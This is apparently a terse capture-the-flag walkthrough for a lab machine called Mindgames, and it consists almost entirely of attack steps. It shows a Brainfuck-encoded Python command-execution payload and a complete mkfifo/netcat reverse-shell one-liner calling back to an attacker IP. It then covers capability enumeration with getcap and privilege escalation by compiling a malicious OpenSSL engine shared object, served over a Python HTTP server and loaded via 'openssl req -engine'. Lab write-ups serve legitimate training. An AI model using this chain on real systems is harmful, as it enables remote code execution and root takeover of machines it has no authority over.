export ip=10.10.117.119



Hello World 
{+[------->++<]>++.++.---------.+++++.++++++.+[--->+<]>+.------.++[->++<]>.-[->+++++<]>++.+++++++..+++.[->+++++<]>+.------------.---[->+++<]>.-[--->+<]>---.+++.------.--------.-[--->+<]>+.+++++++.>++++++++++.}   [ BrainFuck Encoded ]


{import os; os.system(‘id’)}  [run on website so we can see it says we are mindgames user]


lets make a reverse shell but remember the website can only run BrainFuck Encode With python


so {import os; os.system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.2.162 9999>/tmp/f’) }   [encode this in BrainFuck and make a nc listner and fire the encoded text on website]


so now we have a shell 

whoami  [mindgames]

cat /home/user.txt

		<!-- Root Flag -->
		
		
getcap -r / 2>/dev/null

2nd line /usr/bin/openssl = cap_setuid+ep


make {engine.c file}

then compile it with 
cmd:   {
	
	gcc -Wall -fPIC -c engine.c
	ld -shared -Bdynamic engine.o -L/lib -lc -o engine.so
	
	}
	

then take the engine.so file in the rev shell {You can use any mathode}

{I used python SimpleHTTPServer & wget}


then check gtfobins search openssl

check the [Library load] 

then execute the .so file  {openssl req -engine ./engine.so}


cat /root/root.txt






































